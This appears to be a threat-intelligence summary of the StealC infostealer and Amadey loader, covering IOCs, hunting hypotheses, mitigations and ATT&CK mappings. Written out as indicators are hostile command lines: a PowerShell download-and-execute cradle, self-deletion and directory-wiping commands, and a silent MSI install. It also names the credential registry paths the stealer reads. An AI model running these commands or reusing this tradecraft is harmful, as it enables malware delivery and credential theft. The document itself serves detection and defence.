StealC and Amadey: Breaking down infostealers and the cybercrime services that deliver them
StealC is a C++ malware-as-a-service infostealer that harvests credentials, cookies, and session tokens from browsers, email clients, crypto wallets, and gaming platforms, using APC injection to bypass Chromium App-Bound Encryption. Amadey is a modular MaaS loader that delivers StealC and other payloads through a rich backdoor command set including process injection, SOCKS proxying, RDP enablement, and hidden admin account creation. Microsoft DCU disrupted over 200 C2 domains and IPs associated with both threats in a coordinated action with Europol on June 24, 2026.
- filenameclip.dllAmadey clipboard-stealing plugin downloaded from C2 and loaded via rundll32.exe to steal clipboard contents.
- filenamecred.dllAmadey credential-stealing plugin downloaded from C2 /Plugins/ path and loaded via rundll32.exe to steal credentials.
- filenamenudwee.exeAmadey copies itself to this filename in C:\Users\<user>\e079729711 or %TEMP%\e079729711 as part of its persistence mechanism before creating a scheduled task.
- registry_keyHKCU\Software\MartinPrikryl\WinSCP2\SessionsStealC reads saved WinSCP FTP/SFTP session credentials from this registry key, reversing WinSCP's custom password obfuscation.
- registry_keyHKCU\Software\Microsoft\Office\<version>\Outlook\ProfilesStealC enumerates this registry key to extract Microsoft Outlook email account profiles including server settings and encrypted passwords.
- registry_keyHKCU\SOFTWARE\Valve\SteamStealC retrieves the Steam installation path from this registry key to collect session and configuration files for Steam account theft.
Detection / Hunteropenrouter
What Happened
Cybercriminals are renting tools called StealC and Amadey to steal passwords, cookies, and session tokens from people's computers. StealC silently collects saved login information from web browsers, email apps, cryptocurrency wallets, and gaming accounts, then sends it back to the attackers. Amadey is a delivery tool that installs StealC and other malicious software onto victims' computers. These stolen credentials are then sold on underground markets, sometimes for just a few dollars, and can be used to break into corporate networks, bypass security checks, and deploy ransomware. Microsoft, working with European law enforcement, seized or blocked over 200 server domains used by these criminals. Organizations should ensure their antivirus and endpoint protection are up to date, educate employees about fake software downloads and deceptive website tricks, and monitor for unusual use of corporate credentials.
Key Takeaways
- StealC is a C++ MaaS infostealer that harvests browser credentials, crypto wallets, email client credentials, Steam session data, and screenshots, defeating Chromium App-Bound Encryption via APC process injection into a sacrificial suspended process.
- Amadey is a modular C++ MaaS loader active since 2018 that delivers StealC and other payloads via backdoor commands including EXE/DLL/MSI drops, PowerShell execution, SOCKS proxy, VNC, RDP enablement, and hidden admin account creation.
- Microsoft DCU disrupted 200+ StealC and Amadey C2 domains and IPs on June 24, 2026, in coordination with Europol and industry partners.
- Both StealC and Amadey perform language checks to avoid execution on Russian, Ukrainian, Belarusian, Kazakh, or Uzbek systems.
- Infostealer logs are monetized within hours on dark web markets and Telegram channels ($2-$50+ per log), feeding access brokers and ransomware operations.
Affected Systems
- Windows 10
- Windows 11
- Chromium-based browsers (Chrome, Edge, Brave, Opera, Vivaldi)
- Gecko-based browsers (Firefox, Thunderbird, Waterfox)
- Microsoft Outlook
- Foxmail email client
- WinSCP FTP/SFTP client
- Steam gaming platform
- Cryptocurrency wallet browser extensions
Attack Chain
Initial infection occurs via SEO poisoning, malicious advertising, ClickFix social engineering, or phishing emails delivering a first-stage loader such as Amadey. Amadey establishes persistence by copying itself to nudwee.exe in a user-profile directory and creating a scheduled task, then registers with its C2 over HTTP using RC4-encrypted victim fingerprint data. Amadey receives backdoor commands to download and execute additional payloads including StealC, which performs comprehensive credential theft from browsers (bypassing Chromium ABE via APC injection into a suspended process), email clients, WinSCP, Steam, and file grabbing rules from C2. StealC exfiltrates all stolen data in individual RC4-encrypted Base64-encoded HTTP POST requests, optionally downloads further payloads via EXE/PowerShell/MSI execution, and self-deletes to hinder forensic investigation. Stolen credentials are monetized through access brokers on dark web markets and Telegram, feeding ransomware operations.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: No
- Platforms: Microsoft Defender Antivirus detections, Microsoft Defender for Endpoint detections
The article lists Microsoft Defender Antivirus detection names (Trojan:Win32/Amadey, Trojan:Win64/Stealc, etc.) and Defender for Endpoint behavioral alerts, but does not provide YARA, Sigma, Snort, Suricata, KQL, SPL, or EQL rules.
Detection Engineering Assessment
EDR Visibility: Medium — Process creation, scheduled task creation, registry access, and file operations are visible to EDR. However, StealC's APC injection into a suspended process and in-process Chromium ABE decryption may blend with legitimate browser process activity. Amadey's use of rundll32.exe for plugin loading is common and may require behavioral correlation. Network Visibility: Medium — C2 communication occurs over HTTP with RC4-encrypted Base64-encoded payloads, making content inspection difficult. Network defenders can pivot on HTTP POST patterns to suspicious domains, but without published C2 IOCs, detection relies on behavioral and reputational analysis. Detection Difficulty: Hard — Both StealC and Amadey use RC4 encryption for C2 communications, self-delete after execution, perform language checks to avoid analysis regions, and StealC bypasses Chromium ABE via process injection. The lack of published C2 IOCs and the use of legitimate tools (rundll32, msiexec, PowerShell) for execution increase detection difficulty. Initial infections often occur on unmanaged devices outside corporate monitoring.
Required Log Sources
- Sysmon Event ID 1 (Process Creation)
- Sysmon Event ID 3 (Network Connection)
- Sysmon Event ID 8 (RemoteThread or CreateRemoteThread)
- Sysmon Event ID 11 (FileCreate)
- Sysmon Event ID 12/13/14 (Registry events)
- Windows Security Event ID 4688 (Process Creation)
- Windows Security Event ID 4624 (Logon events for credential abuse)
- Windows Task Scheduler operational log
- EDR telemetry for process injection and memory allocation
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Consider hunting for processes spawned with the CREATE_SUSPENDED flag followed by QueueUserAPC and ResumeThread calls, which would indicate APC injection consistent with StealC's Chromium ABE bypass technique (T1055.004). | EDR process telemetry, Sysmon Event ID 8, API call monitoring | Defense Evasion / Credential Access | Low - legitimate software rarely uses this specific injection pattern |
| Consider hunting for scheduled task creation referencing an executable in a user-profile subdirectory with an unusual folder name pattern, which would be consistent with Amadey persistence (T1053.005). | Windows Task Scheduler logs, Sysmon Event ID 1, EDR scheduled task telemetry | Persistence | Medium - legitimate software installers also create scheduled tasks in user directories |
| Consider hunting for rundll32.exe loading DLL files from non-standard temporary or AppData locations with an exported function named 'Main', which would be consistent with Amadey plugin loading for credential and clipboard theft. | EDR process telemetry, Sysmon Event ID 1, file creation events | Execution / Credential Access | Medium - some legitimate applications use rundll32 with similar patterns |
| Consider hunting for files written to C:\ProgramData\ with a .txt extension that are created and deleted within a short time window, which would be consistent with StealC's IPC file for Chromium credential decryption output. | Sysmon Event ID 11 (FileCreate) and Event ID 23 (FileDelete), EDR file telemetry | Credential Access | Low - short-lived text files in ProgramData with hardware-ID-like names are unusual |
| Consider hunting for HTTP POST requests containing Base64-encoded bodies to previously unseen domains, particularly where the response is parsed as JSON, which would be consistent with StealC C2 registration and configuration retrieval. | Network proxy logs, EDR network connection telemetry, TLS/HTTP inspection | Command and Control | High - many legitimate applications use Base64-encoded HTTP POST with JSON responses |
Control Gaps
- Traditional signature-based AV may miss StealC samples due to MaaS model producing high volumes of distinct customized builds
- Network inspection cannot decrypt RC4-encrypted C2 payloads to identify stolen data exfiltration
- Unmanaged or personal devices used by employees for corporate access are typically outside EDR and SIEM monitoring scope
- Valid credential abuse from stolen session cookies bypasses MFA and appears as legitimate authentication to identity providers
- Amadey's use of compromised self-hosted GitLab instances for payload delivery blends with legitimate DevOps infrastructure
Key Behavioral Indicators
- Process creation of cmd.exe with timeout and del arguments indicating self-deletion behavior
- Creation of scheduled task referencing executable in path containing directory name 'e079729711'
- rundll32.exe execution with DLL filenames cred.dll or clip.dll loaded from non-standard paths
- Process spawning with CREATE_SUSPENDED flag followed by APC queue and thread resume sequence
- Short-lived .txt files created under C:\ProgramData\ with hardware-ID-like naming pattern
- msiexec.exe execution with /passive flag for silently installing downloaded MSI payloads
- PowerShell cradle pattern using iwr/iex cmdlets for download-and-execute
- Registry access to HKCU\Software\Martin Prikryl\WinSCP 2\Sessions by non-WinSCP processes
- Creation of new local user account followed by addition to Administrators group (Amadey hidden admin command 0x19)
- Registry modification setting fDenyTSConnections to 0 enabling RDP (Amadey command 0x18)
False Positive Assessment
- Medium - While the specific file artifacts (nudwee.exe, cred.dll, clip.dll) and APC injection patterns have low false positive rates, the broader behavioral indicators such as rundll32.exe execution, scheduled task creation, and HTTP POST requests with encoded payloads are common in legitimate software and require additional context for accurate detection.
Recommendations
Immediate Mitigation
- Verify against your organization's incident response runbook and team escalation paths before acting. Consider reviewing authentication logs for suspicious sign-ins using valid credentials from unexpected locations or devices, particularly VPN and SSO sessions that may carry stolen session cookies.
- Consider blocking and hunting for the identified file artifacts (nudwee.exe, cred.dll, clip.dll) and registry paths in your EDR if supported by your tooling.
- If your EDR supports host isolation, consider preparing isolation procedures for any endpoints identified with StealC or Amadey artifacts, as these threats can deliver secondary payloads including ransomware.
Infrastructure Hardening
- Consider evaluating whether tamper protection is enabled on all endpoints to prevent attackers from disabling antivirus or adding exclusions.
- If supported by your identity provider, consider implementing conditional access policies that evaluate device compliance and risk signals before granting access to corporate resources, to reduce the impact of stolen credentials from unmanaged devices.
- Consider reviewing and tightening session token lifetimes and revocation policies for VPN and SSO systems, particularly for sessions originating from unmanaged devices.
- Where supported by your endpoint management platform, consider enabling attack surface reduction rules such as advanced protection against ransomware to block initial infection vectors.
User Protection
- Consider deploying browser security features such as Microsoft Defender SmartScreen or equivalent to block access to malicious websites delivering fake or trojanized software.
- Consider encouraging users to download software only from official vendor sources and to be cautious of cracked applications, game cheats, and free utilities promoted through search results or advertisements.
- If applicable to your environment, consider educating users about the ClickFix technique where websites trick users into pasting commands into the Windows Run dialog or terminal.
Security Awareness
- Consider incorporating infostealer awareness into existing security training programs, emphasizing that personal device infections can lead to corporate credential compromise.
- Consider rolling out guidance on recognizing SEO poisoning and malicious advertising that promote fake software downloads.
- Consider reminding employees to avoid storing corporate credentials in browser password managers on unmanaged or personal devices where endpoint monitoring is absent.
MITRE ATT&CK Mapping
- T1059.001 - PowerShell
- T1059.003 - Windows Command Shell
- T1055 - Process Injection
- T1055.004 - Asynchronous Procedure Call
- T1547.002 - Boot or Logon Autostart Execution: Authentication Package
- T1027 - Obfuscated Files or Information
- T1112 - Modify Registry
- T1005 - Data from Local System
- T1555.003 - Credentials from Password Stores: Credentials from Web Browsers
- T1555 - Credentials from Password Stores
- T1083 - File and Directory Discovery
- T1518.001 - Software Discovery: Security Software Discovery
- T1087 - Account Discovery
- T1136.001 - Create Account: Local Account
- T1543.002 - Create or Modify System Process: Systemd Service
- T1071.001 - Application Layer Protocol: Web Protocols
- T1113 - Screen Capture
- T1218.007 - System Binary Proxy Execution: Msiexec
- T1218.011 - System Binary Proxy Execution: Rundll32
- T1546.012 - Event Triggered Execution: Image File Execution Options
- T1090 - Proxy
- T1021.001 - Remote Services: Remote Desktop Protocol
Additional IOCs
- Registry Keys:
HKCU\Software\Microsoft\Windows Messaging Subsystem\Profiles- StealC enumerates this registry key as an alternate Outlook profile location to extract email account credentials.
- File Paths:
C:\ProgramData\<HWID>.txt- StealC IPC file used to receive decrypted Chromium credential output from the injected payload in the sacrificial process; up to 511 bytes read back then deleted.C:\Users\<user name>\e079729711- Amadey target directory on Windows 10/11 where it copies itself as nudwee.exe for persistence.%TEMP%\e079729711- Amadey target directory on older Windows versions where it copies itself as nudwee.exe for persistence.
- Command Lines:
- Purpose: Self-deletion of StealC malware from disk after completing data exfiltration | Tools:
cmd.exe,timeout,del| Stage: post-exfiltration cleanup |cmd.exe /c timeout /t 5 & del /f /q - Purpose: PowerShell download-and-execute cradle for additional payloads directed by StealC C2 | Tools:
powershell.exe| Stage: secondary payload execution |iwr <URL> | iex - Purpose: Silent MSI installation of additional payloads downloaded by StealC C2 | Tools:
msiexec.exe| Stage: secondary payload execution |msiexec.exe /i "<path>" /passive - Purpose: Amadey self-uninstall command to delete its own directory on reboot | Tools:
cmd.exe| Stage: cleanup |cmd /C RMDIR /s /q C:\Users\<user name>\e079729711
- Purpose: Self-deletion of StealC malware from disk after completing data exfiltration | Tools:
- Other:
<computer name>_<username>- StealC creates a Windows event using this victim ID format as the event name to prevent multiple running instances via polling loop.e079729711- Directory name used by Amadey for its persistence path under the user profile or temp directory.